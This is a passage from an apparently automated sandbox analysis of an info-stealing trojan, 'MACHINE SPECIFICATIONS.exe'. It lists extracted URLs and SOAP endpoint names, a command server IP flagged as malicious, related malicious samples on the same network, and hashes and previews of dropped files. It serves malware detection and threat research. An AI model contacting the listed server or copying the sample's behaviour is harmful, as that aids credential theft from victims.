                                                        http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exeMACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://support.google.com/chrome/?p=plugin_quicktimeMACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icotmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drfalse
                                                              high
                                                              http://ns.adobe.cobjMACHINE SPECIFICATIONS.exe, 00000001.00000003.364123471.0000000009170000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.350858355.0000000009161000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.364140812.0000000009170000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.364246752.0000000009174000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousMACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://tempuri.org/Endpoint/CheckConnectResponseMACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://schemas.datacontract.org/2004/07/MACHINE SPECIFICATIONS.exe, 00000001.00000002.365800407.0000000003487000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://api.ip.sb/geoip%USERPEnvironmentROFILE%MACHINE SPECIFICATIONS.exe, 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.280657393.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.364558379.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000000.257898395.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://helpx.adMACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drfalse
                                                                  high
                                                                  http://tempuri.org/Endpoint/CheckConnectMACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchtmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drfalse
                                                                    high
                                                                    http://tempuri.org/Endpoint/SetEnvironMACHINE SPECIFICATIONS.exe, 00000001.00000002.365923298.00000000034F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://get.adobMACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://tempuri.org/t_$kMACHINE SPECIFICATIONS.exe, 00000001.00000002.365596726.000000000339F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://ac.ecosia.org/autocomplete?q=tmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drfalse
                                                                      high
                                                                      http://185.222.58.90:1MACHINE SPECIFICATIONS.exe, 00000001.00000002.365923298.00000000034F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://service.real.com/realplayer/security/02062012_player/en/MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressingMACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://support.google.com/chrome/?p=plugin_shockwaveMACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://forms.reaMACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://tempuri.org/Endpoint/GetUpdatesResponseMACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://tempuri.org/Endpoint/EnvironmentSettingsResponseMACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/soap/actor/nextMACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://ns.ado/1MACHINE SPECIFICATIONS.exe, 00000001.00000003.364123471.0000000009170000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.350858355.0000000009161000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.364140812.0000000009170000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.364246752.0000000009174000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drfalse
                                                                                  high
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  185.222.58.90
                                                                                  unknownNetherlands
                                                                                  51447ROOTLAYERNETNLtrue
                                                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                  Analysis ID:633730
                                                                                  Start date and time: 25/05/202205:53:102022-05-25 05:53:10 +02:00
                                                                                  Joe Sandbox Product:CloudBasic
                                                                                  Overall analysis duration:0h 9m 25s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Sample file name:MACHINE SPECIFICATIONS.exe
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                  Number of analysed new started processes analysed:29
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • HDC enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.expl.evad.winEXE@4/27@2/1
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  HDC Information:
                                                                                  • Successful, ratio: 0% (good quality ratio 0%)
                                                                                  • Quality average: 83%
                                                                                  • Quality standard deviation: 0%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 99%
                                                                                  • Number of executed functions: 123
                                                                                  • Number of non-executed functions: 3
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Adjust boot time
                                                                                  • Enable AMSI
                                                                                  • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 172.67.75.172, 104.26.13.31, 104.26.12.31
                                                                                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, go.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  TimeTypeDescription
                                                                                  05:54:45API Interceptor113x Sleep call for process: MACHINE SPECIFICATIONS.exe modified
                                                                                  No context
                                                                                  No context
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                  ROOTLAYERNETNLNew Order.exeGet hashmaliciousBrowse
                                                                                  • 185.222.57.178
                                                                                  e_Receipt.pdf.exeGet hashmaliciousBrowse
                                                                                  • 45.137.22.163
                                                                                  View Payment.exeGet hashmaliciousBrowse
                                                                                  • 45.137.22.35
                                                                                  SecuriteInfo.com.Variant.Babar.54324.15185.exeGet hashmaliciousBrowse
                                                                                  • 185.222.57.79
                                                                                  PAYMENT.exeGet hashmaliciousBrowse
                                                                                  • 185.222.58.237
                                                                                  Payment.exeGet hashmaliciousBrowse
                                                                                  • 45.137.22.122
                                                                                  Quotation.xlsxGet hashmaliciousBrowse
                                                                                  • 185.222.58.51
                                                                                  Order Package.xlsxGet hashmaliciousBrowse
                                                                                  • 185.222.58.244
                                                                                  ORDER SV-033764.exeGet hashmaliciousBrowse
                                                                                  • 185.222.57.155
                                                                                  ORDER_SV-033764.exeGet hashmaliciousBrowse
                                                                                  • 185.222.57.155
                                                                                  ORDER SV-033764.exeGet hashmaliciousBrowse
                                                                                  • 185.222.57.155
                                                                                  ORDER SV-033764.exeGet hashmaliciousBrowse
                                                                                  • 185.222.57.155
                                                                                  Hzb1l180P6.exeGet hashmaliciousBrowse
                                                                                  • 45.137.22.227
                                                                                  bankreportt.exeGet hashmaliciousBrowse
                                                                                  • 185.222.57.252
                                                                                  SecuriteInfo.com.W32.AIDetectNet.01.11996.exeGet hashmaliciousBrowse
                                                                                  • 185.222.57.252
                                                                                  SecuriteInfo.com.W32.AIDetectNet.01.20266.exeGet hashmaliciousBrowse
                                                                                  • 185.222.57.252
                                                                                  aaaaaaaa.docxGet hashmaliciousBrowse
                                                                                  • 185.222.58.48
                                                                                  SecuriteInfo.com.Variant.Strictor.270970.28606.exeGet hashmaliciousBrowse
                                                                                  • 185.222.57.199
                                                                                  INV_TMB-CI2006-003.xlsxGet hashmaliciousBrowse
                                                                                  • 185.222.58.48
                                                                                  Swift Copy.exeGet hashmaliciousBrowse
                                                                                  • 45.137.22.122
                                                                                  No context
                                                                                  No context
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):617
                                                                                  Entropy (8bit):5.347480285514745
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:Q3La/hz92n4M9tDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKharkvoDLI4MWuCv:MLU84qpE4Ks2wKDE4KhK3VZ9pKhIE4Ks
                                                                                  MD5:4E2C52C54E01A6E1B1A9AE5F1DFEA744
                                                                                  SHA1:7768B945A7B642D21C1946F817C4CE91AD81BBD7
                                                                                  SHA-256:C694679BDC1CEACC4E7F1732892773372D6548C71625579BE6A8BE8F39EC95AE
                                                                                  SHA-512:23E707DB6ECBE26936723C43039DA8F57364CA24AF0448B14D8705518F5D94AD3A24A54A5522A9A1FEC8EC9868F738A8A72295F00FCC8CF02E9F5421CC86A7CC
                                                                                  Malicious:true
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):73728
                                                                                  Entropy (8bit):1.1874185457069584
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                  MD5:72A43D390E478BA9664F03951692D109
                                                                                  SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                  SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                  SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):73728
                                                                                  Entropy (8bit):1.1874185457069584
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                  MD5:72A43D390E478BA9664F03951692D109
                                                                                  SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                  SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                  SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1026
                                                                                  Entropy (8bit):4.69422273140364
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
                                                                                  MD5:A686C2E2230002C3810CB3638589BF01
                                                                                  SHA1:4B764DD14070E52A2AC0458F401CDD5724E714FB
                                                                                  SHA-256:38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
                                                                                  SHA-512:1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):73728
                                                                                  Entropy (8bit):1.1874185457069584
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                  MD5:72A43D390E478BA9664F03951692D109
                                                                                  SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                  SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                  SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):73728
                                                                                  Entropy (8bit):1.1874185457069584
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                  MD5:72A43D390E478BA9664F03951692D109
                                                                                  SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                  SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                  SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1026
                                                                                  Entropy (8bit):4.701704028955216
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:t3GWl91lGAalI86LPpWzUkxooDp2Eb6PEA7lhhzhahpmvYMp+wq2MseSnIrzv:t2Wl91lGAad/xoo12e6MyF4/jMp+t2Mh
                                                                                  MD5:5F97B24D9F05FA0379F5E540DA8A05B0
                                                                                  SHA1:D4E1A893EFD370529484B46EE2F40595842C849E
                                                                                  SHA-256:58C103C227966EC93D19AB5D797E1F16E33DCF2DE83FA9E63E930C399E2AD396
                                                                                  SHA-512:A175FDFC82D79343CD764C69CD6BA6B2305424223768EAB081AD7741AA177D44A4E6927190AD156D5641AAE143D755164B07CB0BBC9AA856C4772376112B4B24
                                                                                  Malicious:false
                                                                                  Preview:BNAGMGSPLOQNKLVQWYYWYGDTNIHHPSGKYBNBNGFSZGYYFUVNSOYTAMZPOIOKMFFWDJIYCJGTWZSMXADBSJDEKDTPXDVYBIZFLSTFISYXAKAYQWPLDFAWXXNTSVHRLCINNTRJHMBFQAQBHFRSHDDRJZGIFSOFSRODXCWFIUZRXRQSOCPSXKXNEHLQYKIBJRTMMHJOIZSWESTHTXPULAPGLZHBOLMPQWYSWWOGRJQGYWDWWZMHZMTDMRWBSPIXHCFFOHTJSOAULKIFZVXPTYEBTBEXGQNBQAECQOJGHTKIAXUJLSLPBKTTRORROLNTKPDPOMSZBBLUYFRZXYZSVBGBEMGTACDCBJNXKAMZMCYEWGKSUENLKBJSZIPKQGYXMJTJXBELNVMAZHRUESZSTWROIUXLLMQPYLVQYLCOMOCGPSMJQGILSDDRUUXDRUCCVECNPLWHJLTHCPBZIKDUNRJMJIOQOCHVVNIQFFXFKFHTCVEEAXHTLJMWIUAWAMHGIGQCQJZGXBEDCRRZCNVYKCPWVJCRXIGXZYJENNARSZZREAOODIGZVBXFPAHTZNKNQHLNNETJICOVQGFLQSGSLCOYMPYDSGOPNUXAMCIJBJPJBAABYHKBKWCUAXUHNOCSSTHZYJXPLMFVJQAJDDSNEVXLRUYEQEKUKUIAOQAQJMNLHOUFLFUDMCWRNYNNLOACVSDXDNNBOGQOYGOZTWUOFZYLZQXJEGPQNQFLLILMQUJLCLUOOAOAQRCWMGKHGFJRPSFVQPCSCUDFVYSGDQIHJWSUDEAMVIANGMMFSJJTPNRYYSJYDFLUXJZGSYAAUHOEPMQIZZRSZDCXHRCIPUERSVKWEBDJCXEWWKPAHBVZESVEWPJTYRBKLHQRRPGDGQPGTNNFRMWNTGWIZDBPSGFQDFZWTVLRAOKRBHWFHBPZUBSCFBAMHEWXUIUXMKHPOCNYWNKSRYBQKSUWJLJRNBFNMTDBSZDXVFSLPDQEDCNYELVD
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):73728
                                                                                  Entropy (8bit):1.1874185457069584
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                  MD5:72A43D390E478BA9664F03951692D109
                                                                                  SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                  SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                  SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):73728
                                                                                  Entropy (8bit):1.1874185457069584
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                  MD5:72A43D390E478BA9664F03951692D109
                                                                                  SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                  SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                  SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):73728
                                                                                  Entropy (8bit):1.1874185457069584
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                  MD5:72A43D390E478BA9664F03951692D109
                                                                                  SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                  SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                  SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                  Malicious:false
